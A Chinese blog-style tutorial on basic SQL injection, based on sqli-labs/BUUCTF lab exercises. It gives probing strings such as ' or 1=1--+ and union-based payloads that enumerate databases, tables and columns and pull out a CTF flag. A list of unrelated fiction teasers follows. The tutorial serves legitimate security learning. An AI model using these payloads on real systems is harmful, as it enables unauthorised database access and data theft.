SQL注入总结（一）

基础注入

参考：BUUCTF-Sqli_Labs/ SQL注入天书
非常好的SQL注入文章，本文只是对它的拙劣总结
想掌握注入，实战永远比理论重要。
$ 在文章中代表可控变量
要求读者掌握基本的SQL语法知识
堆叠注入和神奇的存储过程绕过
 SQLMap的使用

常用技巧——基本注入

Metadata

information_schema 数据库中,
schemata 表的 schema_name 列存储了所有数据库的名字。
tables 表的 table_name列存储了所有表的名字，table_schema 列存储了这个表对应的数据库的名字。
columns 表的 column_name列存储了所有列的名字，table_name列存储了这个列对应的表的名字。

猜数据库：select schema_name from information_schema.schemata
猜某库的表：select table_name from information_schema.tables where table_schema=’xxxxx’
猜某表的列：Select column_name from information_schema.columns where table_name=’xxxxx’
从列中选值：Select * from

连接字符串常用函数

CONCAT(str1,str2,...)
CONCAT_WS(SEPARATOR,str1,str2,...)--concat with separator
GROUP_CONCAT()，用来连接查询出来的很多行，上面两个都是连接列。

GROUP_CONCAT([DISTINCT] expr [,expr ...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]][SEPARATOR str_val])

详细讲解

初步测试

1=1--+
'or 1=1--+
"or 1=1--+
)or 1=1--+
')or 1=1--+
") or 1=1--+
"))or 1=1--+

此处考虑两个点，一个是闭合前面你的‘另一个是处理后面的‘，一般采用两种思路，闭合后面的引号或者注释掉，注释掉采用--+或者 #（%23）

Sqli-Lab Lesson 1-4,11,12 练习

特点

有回显，无过滤，最简单的一种。

语句模式

select... from ... where id = '$input' limit...
select... from ... where id = $input limit...
select... from ... where id = ('$input') limit...
select... from ... where id = ("$input") limit...

测试

先确定引号括号的格式。
$input `1 order by$ i`, $i from 1 to n,$ i = 4 时出现错误，说明返回了三个column。

为什么这样测试？因为union要求返回的column数一致。
order by $i,$ i is number:按照第$i列进行排序。

$input -1' union select 1,1,(select group_concat(schema_name) from information_schema.schemata)'查询所有的数据库名字。

返回了 ctftraining,information_schema,mysql,performance_schema,security,test

使用-1来确保查询的结果不存在，否则会显示不出想要的结果。
group_concat：一个聚集函数，将查询中返回的同一个分组的值连接成一个字符串。本例子中使用这个函数来显示所有的数据库名字。

$input -1' union select 1,1,(select group_concat(table_name) from information_schema.tables where table_schema = 'ctftraining')'查询ctftraining这个库中所有表的名字。

返回了 flag,news,users

$input -1' union select 1,1,(select group_concat(column_name) from information_schema.columns where table_name = "flag")'查询flag表中所有的列的名字。

返回了 flag

$input id=-1' union select 1,1,(select group_concat(flag) from ctftraining.flag)'

返回了 flag{0ad1c1e6-26ab-471a-9413-3da193d0fba3}

最后编辑于：2019.10.22 14:38:51

人面猴
序言：七十年代末，一起剥皮案震惊了整个滨河市，随后出现的几起案子，更是在滨河造成了极大的恐慌，老刑警刘岩，带你破解...
沈念sama阅读 219,366评论 6赞 508
死咒
序言：滨河连续发生了三起死亡事件，死亡现场离奇诡异，居然都是意外死亡，警方通过查阅死者的电脑和手机，发现死者居然都...
沈念sama阅读 93,521评论 3赞 395
救了他两次的神仙让他今天三更去死
文/潘晓璐我一进店门，熙熙楼的掌柜王于贵愁眉苦脸地迎上来，“玉大人，你说我怎么就摊上这事。” “怎么了？”我有些...
开封第一讲书人阅读 165,689评论 0赞 356
道士缉凶录：失踪的卖姜人
文/不坏的土叔我叫张陵，是天一观的道长。经常有香客问我，道长，这世上最难降的妖魔是什么？我笑而不...
开封第一讲书人阅读 58,925评论 1赞 295
港岛之恋（遗憾婚礼）
正文为了忘掉前任，我火速办了婚礼，结果婚礼上，老公的妹妹穿的比我还像新娘。我一直安慰自己，他们只是感情好，可当我...
茶点故事阅读 67,942评论 6赞 392
恶毒庶女顶嫁案：这布局不是一般人想出来的
文/花漫我一把揭开白布。她就那样静静地躺着，像睡着了一般。火红的嫁衣衬着肌肤如雪。梳的纹丝不乱的头发上，一...
开封第一讲书人阅读 51,727评论 1赞 305
城市分裂传说
那天，我揣着相机与录音，去河边找鬼。笑死，一个胖子当着我的面吹牛，可吹牛的内容都是我干的。我是一名探鬼主播，决...
沈念sama阅读 40,447评论 3赞 420
双鸳鸯连环套：你想象不到人心有多黑
文/苍兰香墨我猛地睁开眼，长吁一口气：“原来是场噩梦啊……” “哼！你这毒妇竟也来了？” 一声冷哼从身侧响起，我...
开封第一讲书人阅读 39,349评论 0赞 276
万荣杀人案实录
序言：老挝万荣一对情侣失踪，失踪者是张志新（化名）和其女友刘颖，没想到半个月后，有当地人在树林里发现了一具尸体，经...
沈念sama阅读 45,820评论 1赞 317
护林员之死
正文独居荒郊野岭守林人离奇死亡，尸身上长有42处带血的脓包…… 初始之章·张勋以下内容为张勋视角年9月15日...
茶点故事阅读 37,990评论 3赞 337
白月光启示录
正文我和宋清朗相恋三年，在试婚纱的时候发现自己被绿了。大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
茶点故事阅读 40,127评论 1赞 351
活死人
序言：一个原本活蹦乱跳的男人离奇死亡，死状恐怖，灵堂内的尸体忽然破棺而出，到底是诈尸还是另有隐情，我是刑警宁泽，带...
沈念sama阅读 35,812评论 5赞 346
日本核电站爆炸内幕
正文年R本政府宣布，位于F岛的核电站，受9级特大地震影响，放射性物质发生泄漏。R本人自食恶果不足惜，却给世界环境...
茶点故事阅读 41,471评论 3赞 331
男人毒药：我在死后第九天来索命
文/蒙蒙一、第九天我趴在偏房一处隐蔽的房顶上张望。院中可真热闹，春花似锦、人声如沸。这庄子的主人今日做“春日...
开封第一讲书人阅读 32,017评论 0赞 22
一桩弑父案，背后竟有这般阴谋
文/苍兰香墨我抬头看了看天上的太阳。三九已至，却和暖如春，着一层夹袄步出监牢的瞬间，已是汗流浃背。一阵脚步声响...
开封第一讲书人阅读 33,142评论 1赞 272
情欲美人皮
我被黑心中介骗来泰国打工，没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留，地道东北人。一个月前我还...
沈念sama阅读 48,388评论 3赞 373
代替公主和亲
正文我出身青楼，却偏偏与公主长得像，于是被迫代替她去往敌国和亲。传闻我的和亲对象是个残疾皇子，可洞房花烛夜当晚...
茶点故事阅读 45,066评论 2赞 355